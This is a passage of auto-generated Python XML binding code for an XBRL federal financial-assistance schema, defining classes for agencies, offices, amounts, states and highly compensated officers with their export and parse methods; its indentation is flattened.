def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='agencyComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='agencyComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.agencyIdentifier is not None:
self.agencyIdentifier.export(outfile, level, namespace_='gen:', name_='agencyIdentifier', pretty_print=pretty_print)
if self.agencyName is not None:
self.agencyName.export(outfile, level, namespace_='gen:', name_='agencyName', pretty_print=pretty_print)
for agencyOffice_ in self.agencyOffice:
agencyOffice_.export(outfile, level, namespace_='gen:', name_='agencyOffice', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'agencyIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.agencyIdentifier = obj_
obj_.original_tagname_ = 'agencyIdentifier'
elif nodeName_ == 'agencyName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.agencyName = obj_
obj_.original_tagname_ = 'agencyName'
elif nodeName_ == 'agencyOffice':
obj_ = agencyOfficeComplexType.factory()
obj_.build(child_)
self.agencyOffice.append(obj_)
obj_.original_tagname_ = 'agencyOffice'
# end class agencyComplexType
class agencyOfficeComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, officeIdentifier=None, officeName=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.officeIdentifier = officeIdentifier
self.officeName = officeName
def factory(*args_, **kwargs_):
if agencyOfficeComplexType.subclass:
return agencyOfficeComplexType.subclass(*args_, **kwargs_)
else:
return agencyOfficeComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_officeIdentifier(self): return self.officeIdentifier
def set_officeIdentifier(self, officeIdentifier): self.officeIdentifier = officeIdentifier
def get_officeName(self): return self.officeName
def set_officeName(self, officeName): self.officeName = officeName
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.officeIdentifier is not None or
self.officeName is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='agencyOfficeComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='agencyOfficeComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='agencyOfficeComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='agencyOfficeComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='agencyOfficeComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.officeIdentifier is not None:
self.officeIdentifier.export(outfile, level, namespace_='gen:', name_='officeIdentifier', pretty_print=pretty_print)
if self.officeName is not None:
self.officeName.export(outfile, level, namespace_='gen:', name_='officeName', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'officeIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.officeIdentifier = obj_
obj_.original_tagname_ = 'officeIdentifier'
elif nodeName_ == 'officeName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.officeName = obj_
obj_.original_tagname_ = 'officeName'
# end class agencyOfficeComplexType
class amountItemType(monetaryItemType):
subclass = None
superclass = monetaryItemType
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
super(amountItemType, self).__init__(unitRef, decimals, id, contextRef, precision, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if amountItemType.subclass:
return amountItemType.subclass(*args_, **kwargs_)
else:
return amountItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(amountItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='amountItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='amountItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='amountItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='amountItemType'):
super(amountItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='amountItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='amountItemType', fromsubclass_=False, pretty_print=True):
super(amountItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(amountItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class amountItemType
class congressionalDistrictItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(congressionalDistrictItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if congressionalDistrictItemType.subclass:
return congressionalDistrictItemType.subclass(*args_, **kwargs_)
else:
return congressionalDistrictItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(congressionalDistrictItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='congressionalDistrictItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='congressionalDistrictItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='congressionalDistrictItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='congressionalDistrictItemType'):
super(congressionalDistrictItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='congressionalDistrictItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='congressionalDistrictItemType', fromsubclass_=False, pretty_print=True):
super(congressionalDistrictItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(congressionalDistrictItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class congressionalDistrictItemType
class stateItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(stateItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if stateItemType.subclass:
return stateItemType.subclass(*args_, **kwargs_)
else:
return stateItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(stateItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='stateItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='stateItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='stateItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='stateItemType'):
super(stateItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='stateItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='stateItemType', fromsubclass_=False, pretty_print=True):
super(stateItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(stateItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class stateItemType
class businessTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(businessTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if businessTypeItemType.subclass:
return businessTypeItemType.subclass(*args_, **kwargs_)
else:
return businessTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(businessTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='businessTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='businessTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='businessTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='businessTypeItemType'):
super(businessTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='businessTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='businessTypeItemType', fromsubclass_=False, pretty_print=True):
super(businessTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(businessTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class businessTypeItemType
class recordTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(recordTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if recordTypeItemType.subclass:
return recordTypeItemType.subclass(*args_, **kwargs_)
else:
return recordTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(recordTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='recordTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='recordTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='recordTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='recordTypeItemType'):
super(recordTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='recordTypeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='recordTypeItemType', fromsubclass_=False, pretty_print=True):
super(recordTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(recordTypeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class recordTypeItemType
class typeOfActionItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(typeOfActionItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if typeOfActionItemType.subclass:
return typeOfActionItemType.subclass(*args_, **kwargs_)
else:
return typeOfActionItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(typeOfActionItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='typeOfActionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfActionItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='typeOfActionItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='typeOfActionItemType'):
super(typeOfActionItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfActionItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='typeOfActionItemType', fromsubclass_=False, pretty_print=True):
super(typeOfActionItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(typeOfActionItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class typeOfActionItemType
class typeOfTransactionCodeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(typeOfTransactionCodeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if typeOfTransactionCodeItemType.subclass:
return typeOfTransactionCodeItemType.subclass(*args_, **kwargs_)
else:
return typeOfTransactionCodeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(typeOfTransactionCodeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='typeOfTransactionCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfTransactionCodeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='typeOfTransactionCodeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='typeOfTransactionCodeItemType'):
super(typeOfTransactionCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfTransactionCodeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='typeOfTransactionCodeItemType', fromsubclass_=False, pretty_print=True):
super(typeOfTransactionCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(typeOfTransactionCodeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class typeOfTransactionCodeItemType
class highlyCompensatedOfficerComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, highlyCompensatedOfficerFirstName=None, highlyCompensatedOfficerMiddleInitial=None, highlyCompensatedOfficerLastName=None, highlyCompensatedOfficerCompensation=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.highlyCompensatedOfficerFirstName = highlyCompensatedOfficerFirstName
self.highlyCompensatedOfficerMiddleInitial = highlyCompensatedOfficerMiddleInitial
self.highlyCompensatedOfficerLastName = highlyCompensatedOfficerLastName
self.highlyCompensatedOfficerCompensation = highlyCompensatedOfficerCompensation
def factory(*args_, **kwargs_):
if highlyCompensatedOfficerComplexType.subclass:
return highlyCompensatedOfficerComplexType.subclass(*args_, **kwargs_)
else:
return highlyCompensatedOfficerComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_highlyCompensatedOfficerFirstName(self): return self.highlyCompensatedOfficerFirstName
def set_highlyCompensatedOfficerFirstName(self, highlyCompensatedOfficerFirstName): self.highlyCompensatedOfficerFirstName = highlyCompensatedOfficerFirstName
def get_highlyCompensatedOfficerMiddleInitial(self): return self.highlyCompensatedOfficerMiddleInitial
def set_highlyCompensatedOfficerMiddleInitial(self, highlyCompensatedOfficerMiddleInitial): self.highlyCompensatedOfficerMiddleInitial = highlyCompensatedOfficerMiddleInitial
def get_highlyCompensatedOfficerLastName(self): return self.highlyCompensatedOfficerLastName
def set_highlyCompensatedOfficerLastName(self, highlyCompensatedOfficerLastName): self.highlyCompensatedOfficerLastName = highlyCompensatedOfficerLastName
def get_highlyCompensatedOfficerCompensation(self): return self.highlyCompensatedOfficerCompensation
def set_highlyCompensatedOfficerCompensation(self, highlyCompensatedOfficerCompensation): self.highlyCompensatedOfficerCompensation = highlyCompensatedOfficerCompensation
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.highlyCompensatedOfficerFirstName is not None or
self.highlyCompensatedOfficerMiddleInitial is not None or
self.highlyCompensatedOfficerLastName is not None or
self.highlyCompensatedOfficerCompensation is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='highlyCompensatedOfficerComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.highlyCompensatedOfficerFirstName is not None:
self.highlyCompensatedOfficerFirstName.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerFirstName', pretty_print=pretty_print)
if self.highlyCompensatedOfficerMiddleInitial is not None:
self.highlyCompensatedOfficerMiddleInitial.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerMiddleInitial', pretty_print=pretty_print)
if self.highlyCompensatedOfficerLastName is not None:
self.highlyCompensatedOfficerLastName.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerLastName', pretty_print=pretty_print)
if self.highlyCompensatedOfficerCompensation is not None:
self.highlyCompensatedOfficerCompensation.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerCompensation', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'highlyCompensatedOfficerFirstName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.highlyCompensatedOfficerFirstName = obj_
obj_.original_tagname_ = 'highlyCompensatedOfficerFirstName'
elif nodeName_ == 'highlyCompensatedOfficerMiddleInitial':
obj_ = stringItemType.factory()
obj_.build(child_)
self.highlyCompensatedOfficerMiddleInitial = obj_
obj_.original_tagname_ = 'highlyCompensatedOfficerMiddleInitial'
elif nodeName_ == 'highlyCompensatedOfficerLastName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.highlyCompensatedOfficerLastName = obj_
obj_.original_tagname_ = 'highlyCompensatedOfficerLastName'
elif nodeName_ == 'highlyCompensatedOfficerCompensation':
obj_ = amountItemType.factory()
obj_.build(child_)
self.highlyCompensatedOfficerCompensation = obj_
obj_.original_tagname_ = 'highlyCompensatedOfficerCompensation'
# end class highlyCompensatedOfficerComplexType
class identifierType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, scheme=None, valueOf_=None):
self.original_tagname_ = None
self.scheme = _cast(None, scheme)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if identifierType.subclass:
return identifierType.subclass(*args_, **kwargs_)
else:
return identifierType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_scheme(self): return self.scheme
def set_scheme(self, scheme): self.scheme = scheme
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='identifierType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='identifierType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='identifierType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='identifierType'):
if self.scheme is not None and 'scheme' not in already_processed:
already_processed.add('scheme')
outfile.write(' scheme=%s' % (quote_attrib(self.scheme), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='identifierType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('scheme', node)
if value is not None and 'scheme' not in already_processed:
already_processed.add('scheme')
self.scheme = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class identifierType
class foreverType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self):
self.original_tagname_ = None
def factory(*args_, **kwargs_):
if foreverType.subclass:
return foreverType.subclass(*args_, **kwargs_)
else:
return foreverType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='foreverType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='foreverType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='foreverType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='foreverType'):
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='foreverType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
